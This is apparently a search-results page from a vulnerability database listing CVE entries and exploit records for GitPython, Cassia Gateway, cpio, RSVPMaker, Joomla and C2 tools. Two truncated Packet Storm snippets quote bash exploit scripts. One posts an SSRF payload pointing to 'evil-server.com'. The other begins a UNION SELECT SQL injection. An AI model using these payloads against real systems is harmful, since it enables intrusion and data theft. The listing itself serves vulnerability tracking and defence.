Lucene search
+L

2673 matches found

Packet Storm
Packet Storm
added 2024/01/15 12:0 a.m.406 views

HaoKeKeJi YiQiNiu Server-Side Request Forgery

!/bin/bash Set target URL and payload targeturl="http://example.com/application/pay/controller/Api.php" payload="url=http://evil-server.com/exploit" Send the malicious request response=$curl -s -X POST -d "$payload" "$targeturl" Check if the exploit was successful if echo "$response" | grep -q...

9.8CVSS7.4AI score0.00881EPSS
SaveExploits1
Packet Storm
Packet Storm
added 2024/01/15 12:0 a.m.370 views

WordPress RSVPMaker 9.3.2 SQL Injection

!/bin/bash Set the URL of the website running the vulnerable plugin url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php" Set the number of columns in the query columns=5 response=$curl -s "$url" query=$echo "$response" | grep -oP 'FROM . WHERE .' payload="' UNION SELECT...

9.8CVSS7.4AI score0.12003EPSS
SaveExploits3
SUSE CVE
SUSE CVE
added 2024/01/13 2:43 a.m.4 views

SUSE CVE-2024-22190

GitPython is a python library used to interact with Git repositories. There is an incomplete fix for CVE-2023-40590. On Windows, GitPython uses an untrusted search path if it uses a shell to run git, as well as when it runs bash.exe to interpret hooks. If either of those features are used on...

7.8CVSS8.2AI score0.00316EPSS
SaveExploits0References3
OSV
OSV
added 2024/01/11 2:15 a.m.11 views

UBUNTU-CVE-2024-22190

GitPython is a python library used to interact with Git repositories. There is an incomplete fix for CVE-2023-40590. On Windows, GitPython uses an untrusted search path if it uses a shell to run git, as well as when it runs bash.exe to interpret hooks. If either of those features are used on...

7.8CVSS7AI score0.00316EPSS
SaveExploits0References6
OSV
OSV
added 2024/01/11 2:15 a.m.8 views

PYSEC-2024-4

GitPython is a python library used to interact with Git repositories. There is an incomplete fix for CVE-2023-40590. On Windows, GitPython uses an untrusted search path if it uses a shell to run git, as well as when it runs bash.exe to interpret hooks. If either of those features are used on...

7.8CVSS6.9AI score0.00316EPSS
SaveExploits0References3
OSV
OSV
added 2024/01/10 3:15 a.m.7 views

CVE-2023-31446

In Cassia Gateway firmware XC10002.1.1.2303082218 and XC20002.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup...

9.8CVSS5.8AI score0.61081EPSS
SaveExploits1References3
NVD
NVD
added 2024/01/10 3:15 a.m.27 views

CVE-2023-31446

In Cassia Gateway firmware XC10002.1.1.2303082218 and XC20002.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup...

9.8CVSS9.6AI score0.61081EPSS
SaveExploits1References3
Prion
Prion
added 2024/01/10 3:15 a.m.20 views

Code injection

In Cassia Gateway firmware XC10002.1.1.2303082218 and XC20002.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup...

7.5CVSS7.4AI score0.61081EPSS
SaveExploits1References3Affected Software2
Cvelist
Cvelist
added 2024/01/10 12:0 a.m.34 views

CVE-2023-31446

In Cassia Gateway firmware XC10002.1.1.2303082218 and XC20002.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup...

9.7AI score0.61081EPSS
SaveExploits1References3
CVE
CVE
added 2024/01/10 12:0 a.m.61 views

CVE-2023-31446

Cassia Gateway firmware versions XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947 expose a vulnerability where the queueUrl parameter in /bypass/config is not sanitized, enabling injection of Bash code that executes with root privileges at device startup. This affects the Cassia Gateway firmwa...

9.8CVSS9.3AI score0.61081EPSS
SaveIn wildExploits1References3Affected Software1
0day.today
0day.today
added 2024/01/09 12:0 a.m.358 views

cpio 2.13 Privilege Escalation Vulnerability

cpio version 2.13 suffers from a privilege escalation vulnerability via setuid files in a cpio archive. cpio privilege escalation vulnerability via setuid files in cpio archive Happy New Year, let in 2024 happiness be with you! : When extracting archives cpio at least version 2.13 preserves the...

7.6AI score
SaveExploits0
Packet Storm
Packet Storm
added 2024/01/09 12:0 a.m.289 views

cpio 2.13 Privilege Escalation

cpio privilege escalation vulnerability via setuid files in cpio archive Happy New Year, let in 2024 happiness be with you! : When extracting archives cpio at least version 2.13 preserves the setuid flag, which might lead to privilege escalation. One example is r00t extracts to /tmp/ and scidiot...

7.4AI score
SaveExploits0
Positive Technologies
Positive Technologies
added 2024/01/06 12:0 a.m.7 views

PT-2024-1049 · Cassia · Cassia Gateway Firmware Xc2000 +1

Name of the Vulnerable Software and Affected Versions: Cassia Gateway firmware XC1000 2.1.1.2303082218 Cassia Gateway firmware XC2000 2.1.1.2303090947 Description: The issue is related to the queueUrl parameter in the "/bypass/config" API endpoint, which is not properly sanitized. This allows for...

9.8CVSS9.3AI score0.61081EPSS
SaveExploits1References14
NVD
NVD
added 2023/12/29 5:16 p.m.47 views

CVE-2023-52137

The tj-actions/verify-changed-files action allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. The verify-changed-files workflow returns the list of files changed within a workflow execution. This could potentially allow...

8.8CVSS0.02621EPSS
SaveExploits1References3
SUSE CVE
SUSE CVE
added 2023/12/25 2:10 a.m.5 views

SUSE CVE-2023-50254

Deepin Linux's default document reader deepin-reader software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution RCE can be achieved by...

7.8CVSS7.7AI score0.02118EPSS
SaveExploits2References3
GithubExploit
GithubExploit
added 2023/12/18 12:47 a.m.603 views

Exploit for Improper Access Control in Joomla Joomla\!

CVE-2023-23752 Description This repository contains Pytho...

5.3CVSS6.4AI score0.99827EPSS
SaveExploits43
Kitploit
Kitploit
added 2023/12/07 11:30 a.m.35 views

BlueBunny - BLE Based C2 For Hak5's Bash Bunny

C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II. Send your Bash Bunny all the instructions it needs just over the air. Overview Structure Installation & Start 1. Install required dependencies pip install pygatt "pygattGATTTOOL" Make sure BlueZ is...

7.8AI score
SaveExploits0References1
GithubExploit
GithubExploit
added 2023/11/29 5:1 p.m.386 views

Exploit for Improper Access Control in Joomla Joomla\!

Usage...

5.3CVSS6AI score0.99827EPSS
SaveExploits43
GithubExploit
GithubExploit
added 2023/11/28 4:8 p.m.570 views

Exploit for Improper Access Control in Joomla Joomla\!

Joomla! v4.2.8 - Unauthenticated Information Disclosure Ex...

5.3CVSS5.7AI score0.99827EPSS
SaveExploits43
Kitploit
Kitploit
added 2023/11/13 11:30 a.m.35 views

Hades-C2 - Hades Basic Command And Control Server

Hades is a basic Command & Control server built using Python. It is currently extremely bare bones, but I plan to add more features soon. Features are a work in progress currently. This is a project made mostly for me to learn Malware Development, Sockets, and C2 infrastructure setups. Currently,...

7.7AI score
SaveExploits0References6
Rows per page
Query Builder